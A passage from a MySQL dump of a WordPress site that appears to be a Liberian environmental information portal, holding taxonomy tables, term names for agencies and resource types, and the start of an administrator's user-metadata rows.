3285,86,0),(3285,175,0),(3287,52,0),(3287,86,0),(3287,175,0),(3287,176,0),(3290,143,0),(3290,189,0),(3297,143,0),(3297,189,0),(3297,200,0),(3307,143,0),(3307,189,0),(3313,143,0),(3313,189,0),(3316,143,0),(3316,189,0),(3430,143,0),(3430,144,0),(3430,189,0),(3438,143,0),(3438,144,0),(3438,189,0),(3479,1,0),(3479,171,0),(3479,189,0),(3482,144,0),(3482,171,0),(3482,189,0),(3482,205,0),(3486,143,0),(3486,189,0),(3489,143,0),(3489,189,0),(3489,190,0),(3498,143,0),(3498,144,0),(3498,189,0),(3498,191,0),(3531,143,0),(3531,189,0),(3534,143,0),(3534,189,0),(3541,54,0),(3541,86,0),(3541,174,0),(3664,174,0),(3691,174,0),(3710,143,0),(3710,189,0),(3714,143,0),(3714,191,0),(3714,205,0),(3721,143,0),(3721,189,0),(3721,205,0),(3724,143,0),(3724,189,0),(3727,143,0),(3727,189,0),(3731,143,0),(3731,189,0),(3735,143,0),(3735,189,0),(3738,143,0),(3738,189,0),(3742,144,0),(3742,189,0),(3742,226,0),(3746,143,0),(3746,189,0),(3749,143,0),(3749,189,0),(3752,143,0),(3752,189,0),(3764,144,0),(3764,172,0),(3771,143,0),(3771,171,0),(3774,143,0),(3774,171,0),(3774,203,0),(3777,143,0),(3777,203,0),(3781,144,0),(3781,172,0),(3800,227,0),(3805,228,0),(3834,229,0),(3877,229,0),(3901,230,0),(3904,230,0),(3913,230,0),(4025,230,0),(4033,230,0),(4054,230,0),(4058,230,0),(4088,230,0),(4096,229,0),(4138,230,0),(4151,230,0),(4233,228,0),(4238,52,0),(4238,70,0),(4238,86,0),(4238,174,0),(4238,175,0),(4238,176,0),(4275,143,0),(4275,189,0),(4282,133,0),(4283,133,0),(4284,133,0),(4285,227,0),(4287,230,0),(4289,230,0),(4301,165,0),(4323,143,0),(4323,189,0),(4326,143,0),(4326,172,0),(4326,189,0),(4329,143,0),(4332,143,0),(4332,189,0),(4335,143,0),(4335,172,0),(4335,189,0),(4335,191,0),(4338,143,0),(4338,189,0),(4341,143,0),(4341,189,0),(4357,52,0),(4357,70,0),(4357,86,0),(4357,174,0),(4357,175,0),(4357,176,0),(4363,52,0),(4363,70,0),(4363,86,0),(4368,52,0),(4368,174,0),(4368,175,0),(4368,176,0),(4368,225,0),(4373,52,0),(4373,174,0),(4373,175,0),(4373,176,0),(4373,225,0),(4377,70,0),(4377,85,0),(4377,88,0),(4377,188,0),(4382,60,0),(4382,70,0),(4382,86,0),(4382,174,0),(4382,175,0),(4387,70,0),(4387,86,0),(4387,174,0),(4387,175,0),(4387,176,0),(4387,178,0),(4387,223,0),(4391,52,0),(4391,70,0),(4391,86,0),(4391,174,0),(4391,175,0),(4391,176,0),(4391,178,0),(4396,52,0),(4396,70,0),(4396,86,0),(4396,174,0),(4396,175,0),(4396,176,0),(4400,143,0),(4404,52,0),(4404,86,0),(4404,175,0),(4408,52,0),(4408,86,0),(4408,174,0),(4408,175,0),(4412,52,0),(4412,86,0),(4412,175,0),(4412,209,0),(4416,56,0),(4416,86,0),(4420,56,0),(4420,86,0),(4424,85,0),(4424,188,0),(4428,188,0),(4428,231,0),(4432,88,0),(4432,188,0),(4436,188,0),(4436,231,0),(4440,52,0),(4440,85,0),(4440,174,0),(4444,52,0),(4444,85,0),(4444,175,0),(4448,52,0),(4448,85,0),(4448,176,0),(4454,143,0),(4454,189,0),(4457,162,0),(4514,143,0),(4514,189,0),(4517,143,0),(4517,189,0),(4520,143,0),(4520,189,0),(4524,144,0),(4524,172,0),(4524,189,0),(4529,144,0),(4529,172,0),(4529,189,0),(4542,52,0),(4542,70,0),(4542,85,0),(4546,62,0),(4546,70,0),(4546,85,0),(4551,143,0),(4551,197,0),(4556,52,0),(4556,70,0),(4556,161,0),(4556,219,0),(4566,143,0),(4566,189,0),(4582,143,0),(4582,171,0),(4582,173,0),(4582,189,0),(4586,133,0),(4587,52,0),(4587,70,0),(4587,86,0),(4591,52,0),(4591,70,0),(4591,86,0),(4608,52,0),(4608,161,0),(4612,52,0),(4612,161,0),(4645,143,0),(4645,189,0),(4645,232,0),(4648,143,0),(4648,189,0),(4651,143,0),(4651,189,0),(4654,143,0),(4654,189,0),(4657,143,0),(4657,189,0),(4657,233,0),(4660,143,0),(4660,189,0),(4660,191,0),(4660,198,0),(4660,200,0),(4660,206,0),(4660,234,0),(4660,235,0),(4660,236,0),(4660,237,0),(4663,143,0),(4663,189,0),(4663,232,0),(4668,143,0),(4668,189,0),(4674,143,0),(4674,189,0),(4677,143,0),(4677,189,0),(4677,234,0),(4681,143,0),(4681,189,0),(4681,234,0),(4685,143,0),(4685,189,0),(4685,234,0),(4688,143,0),(4688,189,0),(4691,143,0),(4691,189,0),(4691,238,0),(4694,143,0),(4694,172,0),(4694,189,0),(4697,143,0),(4697,171,0),(4697,189,0),(4697,234,0),(4700,143,0),(4700,189,0),(4700,232,0),(4703,143,0),(4703,189,0),(4703,239,0),(4706,143,0),(4706,189,0),(4709,143,0),(4709,189,0),(4712,143,0),(4712,189,0),(4712,205,0),(4722,143,0),(4722,189,0),(4741,143,0),(4741,172,0),(4741,189,0),(4744,143,0),(4744,189,0),(4747,143,0),(4747,189,0),(4747,205,0),(4750,143,0),(4750,189,0),(4750,200,0),(4750,234,0),(4750,238,0),(4753,143,0),(4753,196,0),(4756,143,0),(4756,172,0),(4756,189,0),(4759,143,0),(4759,189,0),(4759,234,0),(4762,143,0),(4762,207,0),(4762,234,0),(4765,143,0),(4765,196,0),(4768,143,0),(4768,196,0),(4771,143,0),(4771,196,0),(4776,144,0),(4776,171,0),(4776,240,0),(4776,241,0),(4792,52,0),(4792,174,0),(4792,225,0),(4797,52,0),(4797,174,0),(4797,225,0),(4802,52,0),(4802,225,0),(4858,86,0),(4858,174,0),(4858,223,0),(4862,52,0),(4862,174,0),(4862,225,0),(4866,67,0),(4866,174,0),(4866,242,0),(4870,70,0),(4870,86,0),(4874,52,0),(4874,70,0),(4874,161,0),(4878,70,0),(4878,86,0),(4883,70,0),(4888,174,0),(4888,243,0),(4893,174,0),(4893,244,0),(4897,86,0),(4897,174,0),(4918,230,0),(4923,230,0),(4926,229,0),(4936,2,0),(4976,143,0),(4976,206,0),(4977,143,0),(4977,196,0),(4980,143,0),(4980,196,0),(4983,143,0),(4983,206,0),(4988,143,0),(4988,206,0),(4996,143,0),(4996,189,0),(4996,234,0),(5020,70,0),(5020,86,0),(5020,188,0),(5024,56,0),(5024,70,0),(5024,86,0),(5028,56,0),(5028,70,0),(5028,86,0),(5033,163,0),(5037,86,0),(5037,245,0),(5042,53,0),(5042,70,0),(5042,86,0),(5046,53,0),(5046,70,0),(5046,86,0),(5050,53,0),(5050,70,0),(5050,86,0),(5054,53,0),(5054,70,0),(5054,86,0),(5058,65,0),(5058,161,0),(5058,174,0),(5058,175,0),(5062,56,0),(5062,70,0),(5062,243,0),(5067,61,0),(5067,86,0),(5067,175,0),(5071,52,0),(5071,70,0),(5071,86,0),(5071,174,0),(5071,175,0),(5071,209,0),(5076,61,0),(5076,70,0),(5076,243,0),(5080,61,0),(5080,70,0),(5080,86,0),(5101,143,0),(5101,189,0),(5101,234,0),(5101,238,0),(5122,143,0),(5125,143,0),(5125,191,0),(5128,143,0),(5128,191,0),(5131,143,0),(5131,190,0),(5131,246,0),(5134,143,0),(5134,190,0),(5134,240,0),(5137,143,0),(5137,190,0),(5137,247,0),(5140,52,0),(5140,70,0),(5140,86,0),(5146,52,0),(5146,178,0),(5146,217,0),(5146,248,0),(5153,52,0),(5153,174,0),(5153,178,0),(5157,52,0),(5157,178,0),(5163,162,0),(5176,249,0),(5248,52,0),(5248,70,0),(5248,250,0),(5253,143,0),(5253,251,0),(5256,143,0),(5256,172,0),(5256,189,0),(5256,200,0),(5256,252,0),(5256,253,0),(5259,52,0),(5259,88,0),(5259,175,0),(5264,52,0),(5264,78,0),(5264,175,0),(5268,144,0),(5268,252,0),(5271,144,0),(5271,171,0),(5271,189,0),(5276,143,0),(5276,189,0),(5276,251,0),(5280,143,0),(5280,189,0),(5289,143,0),(5289,189,0),(5292,1,0),(5292,172,0),(5292,189,0),(5295,143,0),(5295,189,0),(5298,143,0),(5298,171,0),(5298,189,0),(5301,143,0),(5301,171,0),(5301,172,0),(5301,205,0),(5301,237,0),(5304,143,0),(5304,189,0),(5304,190,0),(5304,205,0),(5304,246,0),(5304,254,0),(5307,143,0),(5307,196,0),(5310,143,0),(5310,171,0),(5310,190,0),(5310,234,0),(5314,143,0),(5314,171,0),(5314,172,0),(5314,189,0),(5314,251,0),(5317,143,0),(5317,196,0),(5320,143,0),(5320,191,0),(5323,143,0),(5323,191,0),(5326,61,0),(5326,70,0),(5326,86,0),(5330,61,0),(5330,70,0),(5330,209,0),(5334,143,0),(5334,196,0),(5353,143,0),(5353,189,0),(5353,234,0),(5356,143,0),(5356,172,0),(5356,189,0),(5359,143,0),(5359,189,0),(5363,53,0),(5363,88,0),(5363,174,0),(5374,50,0),(5378,50,0),(5378,82,0),(5383,50,0),(5383,82,0),(5397,143,0),(5397,189,0),(5400,144,0),(5400,189,0),(5403,1,0),(5406,143,0),(5406,189,0),(5406,234,0),(5409,143,0),(5409,189,0),(5409,190,0),(5412,143,0),(5412,234,0),(5415,52,0),(5415,86,0),(5415,175,0),(5415,255,0),(5420,143,0),(5420,189,0),(5420,200,0),(5420,206,0),(5420,234,0),(5425,143,0),(5425,189,0),(5428,143,0),(5428,189,0),(5428,206,0),(5433,143,0),(5433,189,0),(5433,198,0),(5436,143,0),(5436,189,0),(5436,234,0),(5441,143,0),(5441,189,0),(5448,1,0),(5449,143,0),(5449,172,0),(5449,189,0),(5453,1,0),(5454,143,0),(5454,189,0),(5457,143,0),(5457,189,0),(5461,143,0),(5461,189,0),(5464,143,0),(5464,189,0),(5467,52,0),(5467,70,0),(5467,85,0),(5467,216,0),(5472,52,0),(5472,70,0),(5472,85,0),(5489,189,0),(5489,256,0),(5492,143,0),(5492,189,0),(5502,143,0),(5512,143,0),(5512,189,0),(5515,143,0),(5515,189,0),(5515,205,0),(5561,143,0),(5561,189,0),(5567,189,0),(5567,256,0),(5570,189,0),(5570,256,0),(5578,143,0),(5578,189,0),(5582,143,0),(5582,189,0),(5585,143,0),(5585,189,0),(5593,143,0),(5593,189,0),(5598,143,0),(5598,189,0),(5601,143,0),(5601,189,0),(5601,234,0),(5605,143,0),(5609,52,0),(5609,175,0),(5609,257,0),(5613,1,0),(5626,76,0),(5626,175,0),(5626,258,0),(5626,259,0),(5636,143,0),(5662,143,0),(5662,189,0),(5666,52,0),(5666,86,0),(5666,175,0),(5666,188,0),(5666,260,0),(5674,52,0),(5674,86,0),(5674,175,0),(5674,188,0),(5683,143,0),(5683,189,0),(5696,143,0),(5696,189,0),(5700,143,0),(5700,189,0),(5735,143,0),(5735,189,0),(5738,143,0),(5738,189,0),(5762,144,0),(5762,189,0),(5769,143,0),(5769,189,0),(5771,52,0),(5771,70,0),(5771,71,0),(5771,86,0),(5771,209,0),(5778,143,0),(5778,189,0),(5785,189,0),(5785,143,0),(5785,171,0),(5785,172,0),(5811,1,0),(5816,189,0),(5816,144,0),(5824,261,0),(5821,143,0),(5824,52,0),(5828,161,0),(5828,52,0),(5828,70,0),(5833,52,0),(5833,70,0),(5844,189,0),(5844,143,0),(5847,189,0),(5847,143,0),(5859,189,0),(5859,143,0),(5865,189,0),(5865,143,0),(5868,189,0),(5868,143,0),(5872,198,0),(5872,143,0),(5875,189,0),(5875,143,0),(5875,234,0),(5878,189,0),(5878,143,0),(5878,234,0),(5881,189,0),(5881,143,0),(5884,189,0),(5884,143,0),(5889,262,0),(5889,52,0),(5889,70,0),(5902,190,0),(5902,143,0),(5906,189,0),(5906,143,0),(5910,189,0),(5910,143,0),(5914,1,0),(5917,261,0),(5917,52,0),(5917,70,0),(5921,161,0),(5921,85,0),(5921,52,0),(5921,70,0),(5925,161,0),(5925,85,0),(5925,52,0),(5925,70,0),(5930,189,0),(5930,256,0),(5930,238,0),(5930,172,0),(5930,171,0),(5945,189,0),(5945,143,0),(5950,259,0),(5950,178,0),(5950,52,0),(5950,71,0),(5959,1,0),(5961,189,0),(5961,143,0),(5964,189,0),(5964,143,0),(5967,189,0),(5967,143,0),(5975,189,0),(5975,143,0),(5986,189,0),(5986,143,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=263 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,2),(2,2,'nav_menu','',0,18),(5,5,'elementor_library_type','',0,1),(6,6,'nav_menu','',0,6),(49,49,'resource_tag','',0,0),(50,50,'resource_tag','',0,5),(51,51,'resource_tag','',0,0),(52,52,'resource_tag','',0,99),(53,53,'resource_tag','',0,14),(54,54,'resource_tag','',0,4),(55,55,'resource_tag','',0,0),(56,56,'resource_tag','',0,8),(57,57,'resource_tag','',0,4),(58,58,'resource_tag','',0,1),(59,59,'resource_tag','',0,0),(60,60,'resource_tag','',0,7),(61,61,'resource_tag','',0,20),(62,62,'resource_tag','',0,1),(63,63,'resource_tag','',0,0),(64,64,'resource_tag','',0,0),(65,65,'resource_tag','',0,3),(66,66,'resource_tag','',0,0),(67,67,'resource_tag','',0,9),(68,68,'resource_tag','',0,5),(69,69,'resource_tag','',0,11),(70,70,'resource_type','',0,107),(71,71,'resource_type','',0,7),(72,72,'resource_type','',0,0),(73,73,'resource_type','',0,21),(75,75,'resource_category','',0,0),(76,76,'resource_category','',0,5),(77,77,'resource_category','',0,0),(78,78,'resource_category','',0,5),(79,79,'resource_category','',0,2),(80,80,'resource_category','',0,0),(82,82,'resource_category','',0,3),(83,83,'resource_category','',0,0),(84,84,'resource_category','',0,2),(85,85,'resource_category','',0,41),(86,86,'resource_category','',0,69),(87,87,'resource_category','',0,0),(88,88,'resource_category','',0,11),(89,89,'resource_category','',0,1),(120,120,'nav_menu','',0,3),(121,121,'nav_menu','',0,2),(122,122,'nav_menu','',0,5),(133,133,'nav_menu','',0,10),(134,134,'nav_menu','',0,5),(135,135,'nav_menu','',0,2),(136,136,'nav_menu','',0,2),(137,137,'nav_menu','',0,2),(138,138,'nav_menu','',0,2),(139,139,'nav_menu','',0,2),(140,140,'nav_menu','',0,4),(141,141,'nav_menu','',0,1),(142,142,'nav_menu','',0,2),(143,143,'category','',0,185),(144,144,'category','',0,16),(161,161,'resource_category','',0,9),(162,162,'institutions_category','',0,20),(163,163,'institutions_category','',0,8),(164,164,'institutions_category','',0,1),(165,165,'institutions_category','',0,3),(166,166,'resource_tag','',0,0),(167,167,'nav_menu','',0,3),(171,171,'post_tag','',0,17),(172,172,'post_tag','',0,18),(173,173,'post_tag','',0,3),(174,174,'resource_type','',0,47),(175,175,'resource_type','',0,57),(176,176,'resource_type','',0,21),(177,177,'elementor_library_type','',0,2),(178,178,'resource_category','',0,6),(179,179,'nav_menu','',0,2),(180,180,'nav_menu','',0,2),(181,181,'nav_menu','',0,1),(182,182,'nav_menu','',0,1),(183,183,'nav_menu','',0,1),(184,184,'nav_menu','',0,1),(185,185,'nav_menu','',0,1),(186,186,'nav_menu','',0,1),(187,187,'nav_menu','',0,1),(188,188,'resource_tag','',0,8),(189,189,'post_tag','',0,150),(190,190,'post_tag','',0,11),(191,191,'post_tag','',0,8),(192,192,'post_tag','',0,0),(193,193,'post_tag','',0,0),(194,194,'post_tag','',0,0),(195,195,'post_tag','',0,0),(196,196,'post_tag','',0,9),(197,197,'post_tag','',0,1),(198,198,'post_tag','',0,3),(199,199,'post_tag','',0,0),(200,200,'post_tag','',0,6),(201,201,'post_tag','',0,0),(202,202,'post_tag','',0,0),(203,203,'post_tag','',0,2),(204,204,'post_tag','',0,0),(205,205,'post_tag','',0,8),(206,206,'post_tag','',0,6),(207,207,'post_tag','',0,1),(208,208,'post_tag','',0,0),(209,209,'resource_category','',0,7),(210,210,'resource_tag','',0,1),(211,211,'nav_menu','',0,1),(213,213,'resource_tag','',0,0),(215,215,'resource_category','',0,0),(216,216,'resource_category','',0,1),(217,217,'resource_category','',0,1),(218,218,'resource_category','',0,0),(219,219,'resource_category','',0,1),(220,220,'resource_category','',0,0),(221,221,'resource_tag','',0,0),(222,222,'resource_category','',0,0),(223,223,'resource_tag','',0,5),(224,224,'resource_tag','',0,1),(225,225,'resource_category','',0,24),(226,226,'post_format','',0,1),(227,227,'elementor_library_type','',0,1),(228,228,'elementor_library_type','',0,1),(229,229,'elementor_library_type','',0,4),(230,230,'elementor_library_type','',0,5),(231,231,'resource_category','',0,2),(232,232,'post_tag','',0,3),(233,233,'post_tag','',0,1),(234,234,'post_tag','',0,19),(235,235,'post_tag','',0,1),(236,236,'post_tag','',0,1),(237,237,'post_tag','',0,2),(238,238,'post_tag','',0,4),(239,239,'post_tag','',0,1),(240,240,'post_tag','',0,2),(241,241,'post_tag','',0,1),(242,242,'resource_category','',0,1),(243,243,'resource_category','',0,3),(244,244,'resource_category','',0,1),(245,245,'resource_tag','',0,1),(246,246,'post_tag','',0,2),(247,247,'post_tag','',0,1),(248,248,'resource_category','',0,1),(249,249,'wp_theme','',0,1),(250,250,'resource_category','',0,1),(251,251,'post_tag','',0,3),(252,252,'post_tag','',0,2),(253,253,'post_tag','',0,1),(254,254,'post_tag','',0,1),(255,255,'resource_tag','',0,1),(256,256,'category','',0,4),(257,257,'resource_category','',0,1),(258,258,'resource_tag','',0,1),(259,259,'resource_category','',0,1),(260,260,'resource_tag','',0,1),(261,261,'resource_category','',0,2),(262,262,'resource_category','',0,1);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0',
  `term_order` int(4) DEFAULT '0',
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=263 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0,0),(2,'Main_menu','main_menu',0,0),(5,'page','page',0,0),(6,'Footer Menu','footer-menu',0,0),(49,'CARI','cari',0,0),(50,'CI','ci',0,0),(51,'Concessions','concessions',0,0),(52,'EPA','epa',0,0),(53,'FDA','fda',0,0),(54,'FFI','ffi',0,0),(55,'LAA','laa',0,0),(56,'LISGIS','lisgis',0,0),(57,'LLA','lla',0,0),(58,'LiMA','lima',0,0),(59,'MIA','mia',0,0),(60,'MME','mme',0,0),(61,'MOA','moa',0,0),(62,'MOT','mot',0,0),(63,'MPW','mpw',0,0),(64,'MoGCSP','mogcsp',0,0),(65,'NaFAA','nafaa',0,0),(66,'National Legislature','national-legislature',0,0),(67,'UNCBD','uncbd',0,0),(68,'UNCCD','unccd',0,0),(69,'UNFCCC','unfccc',0,0),(70,'Documents','documents',0,0),(71,'Featured Projects','featured-projects',0,0),(72,'News and Blogs','news-and-blogs',0,0),(73,'Topics','topics',0,0),(75,'Books','books',0,0),(76,'Case Studies','case-studies',0,0),(77,'Concept Notes','concept-notes',0,0),(78,'Conventions','conventions',0,0),(79,'Factsheets','factsheets',0,0),(80,'Featured Articles','featured-articles',0,0),(82,'Leaflets','leaflets',0,0),(83,'Maps','maps',0,0),(84,'Newsletters','newsletters',0,0),(85,'Policies','policies',0,0),(86,'Reports','reports',0,0),(87,'Statements','statements',0,0),(88,'Strategy and Action Plans','strategy-and-action-plans',0,0),(89,'Toolkits','toolkits',0,0),(120,'EPA_Sidebar_menu','epa_sidebar_menu',0,0),(121,'FDA_Sidebar_menu','fda_sidebar_menu',0,0),(122,'This_Site','this_site',0,0),(133,'External_Data_Menu','external_data_menu',0,0),(134,'External_Links','external_links',0,0),(135,'MOA_Sidebar_menu','moa_sidebar_menu',0,0),(136,'NaFAA_Sidebar_menu','nafaa_sidebar_menu',0,0),(137,'CI_Sidebar_menu','ci_sidebar_menu',0,0),(138,'FFI_Sidebar_menu','ffi_sidebar_menu',0,0),(139,'MPW_Sidebar_menu','mpw_sidebar_menu',0,0),(140,'MME_Sidebar_menu','mme_sidebar_menu',0,0),(141,'LLA_Sidebar_Menu','lla_sidebar_menu',0,0),(142,'LISGIS_Sidebar_menu','lisgis_sidebar_menu',0,0),(143,'News','news',0,0),(144,'Blog','blog',0,0),(161,'Guidelines','guidelines',0,0),(162,'Government','government',0,0),(163,'International','international',0,0),(164,'National','national',0,0),(165,'Local','local',0,0),(166,'WASH','wash',0,0),(167,'Wash_Sidebar_menu','wash_sidebar_menu',0,0),(171,'Biodiversity','biodiversity',0,0),(172,'Climate Change','climate-change',0,0),(173,'Desertification','desertification',0,0),(174,'Biodiversity','biodiversity',0,0),(175,'Climate Change','climate-change',0,0),(176,'Desertification','desertification',0,0),(177,'section','section',0,0),(178,'Research','research',0,0),(179,'MIA_Sidebar_Menu','mia_sidebar_menu',0,0),(180,'LiMA_Sidebar_Menu','lima_sidebar_menu',0,0),(181,'Concession_Sidebar_Menu','concession_sidebar_menu',0,0),(182,'MOT_Sidebar_Menu','mot_sidebar_menu',0,0),(183,'LAA_Sidebar_Menu','laa_sidebar_menu',0,0),(184,'CARI_Sidebar_Menu','cari_sidebar_menu',0,0),(185,'National_Legislature_Sidebar_Menu','national_legislature_sidebar_menu',0,0),(186,'MGCSP_Sidebar_Menu','mgcsp_sidebar_menu',0,0),(187,'MFDP_Sidebar_Menu','mfdp_sidebar_menu',0,0),(188,'MFDP','mfdp',0,0),(189,'EPA','epa',0,0),(190,'FDA','fda',0,0),(191,'MOA','moa',0,0),(192,'MIA','mia',0,0),(193,'MOT','mot',0,0),(194,'LiMA','lima',0,0),(195,'LAA','laa',0,0),(196,'LLA','lla',0,0),(197,'MoGCSP','mogcsp',0,0),(198,'MFDP','mfdp',0,0),(199,'CARI','cari',0,0),(200,'MME','mme',0,0),(201,'Concessions','concessions',0,0),(202,'National Legislature','national-legislature',0,0),(203,'NaFAA','nafaa',0,0),(204,'FFI','ffi',0,0),(205,'CI','ci',0,0),(206,'MPW','mpw',0,0),(207,'LISGIS','lisgis',0,0),(208,'WASH','wash',0,0),(209,'Project Document','project-document',0,0),(210,'SCNL','scnl',0,0),(211,'SCNL_Sidebar_Menu','scnl_sidebar_menu',0,0),(213,'GIZ','giz',0,0),(215,'Permitting','permitting',0,0),(216,'Noise','noise',0,0),(217,'Water','water',0,0),(218,'Air','air',0,0),(219,'Chemical','chemical',0,0),(220,'Emission','emission',0,0),(221,'MCC','mcc',0,0),(222,'Wast','wast',0,0),(223,'WCF','wcf',0,0),(224,'MOL','mol',0,0),(225,'Presentations','presentations',0,0),(226,'post-format-gallery','post-format-gallery',0,0),(227,'header','header',0,0),(228,'footer','footer',0,0),(229,'loop','loop',0,0),(230,'single-post','single-post',0,0),(231,'Acts','acts',0,0),(232,'GIZ','giz',0,0),(233,'ndma','ndma',0,0),(234,'UNDP','undp',0,0),(235,'MOH','moh',0,0),(236,'MOE','moe',0,0),(237,'MGCSP','mgcsp',0,0),(238,'GEF','gef',0,0),(239,'WASTE MANAGEMENT','waste-management',0,0),(240,'REDD+','redd',0,0),(241,'UNFCCC','unfccc',0,0),(242,'Handbook','handbook',0,0),(243,'Survey','survey',0,0),(244,'Evaluation','evaluation',0,0),(245,'UN Liberia','un-liberia',0,0),(246,'WCF','wcf',0,0),(247,'LCRP','lcrp',0,0),(248,'Article','article',0,0),(249,'kava-child','kava-child',0,0),(250,'Curriculum','curriculum',0,0),(251,'land degradation','land-degradation',0,0),(252,'MRV','mrv',0,0),(253,'MOI','moi',0,0),(254,'SCNL','scnl',0,0),(255,'Novasphere','novasphere',0,0),(256,'Public Service Announcement','public-service-announcement',0,0),(257,'Frame Work','frame-work',0,0),(258,'National University Climate Action Laboratory','national-university-climate-action-laboratory',0,0),(259,'Report','report',0,0),(260,'UNDP','undp',0,0),(261,'Regulation','regulation',0,0),(262,'Policy','policy',0,0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=914 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','admin_2'),(2,1,'first_name','Administrator'),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wp_user_level','10'),(14,1,'dismissed_wp_pointers','text_widget_custom_html'),(15,1,'show_welcome_panel','1'),(17,1,'wp_dashboard_quick_press_last_post_id','5783'),(18,1,'closedpostboxes_dashboard','a:0:{}'),(19,1,'metaboxhidden_dashboard','a:3:{i:0;s:20:\"e-dashboard-overview\";i:1;s:21:\"dashboard_quick_press\";i:2;s:17:\"dashboard_primary\";}'),(20,1,'wp_user-settings','libraryContent=browse&editor=tinymce&hidetb=1&editor_expand=on&post_dfw=off&advImgDetails=show'),(21,1,'wp_user-settings-time','1575709057'),(22,1,'manageedit-postcolumnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),(23,1,'manageedit-postcolumnshidden_default','1'),(24,1,'manageedit-pagecolumnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),(25,1,'manageedit-pagecolumnshidden_default','1'),(26,1,'manageedit-elementor_librarycolumnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),(27,1,'manageedit-elementor_librarycolumnshidden_default','1'),(28,1,'manageedit-oceanwp_librarycolumnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),(29,1,'manageedit-oceanwp_librarycolumnshidden_default','1'),(30,1,'manageedit-elementor-hf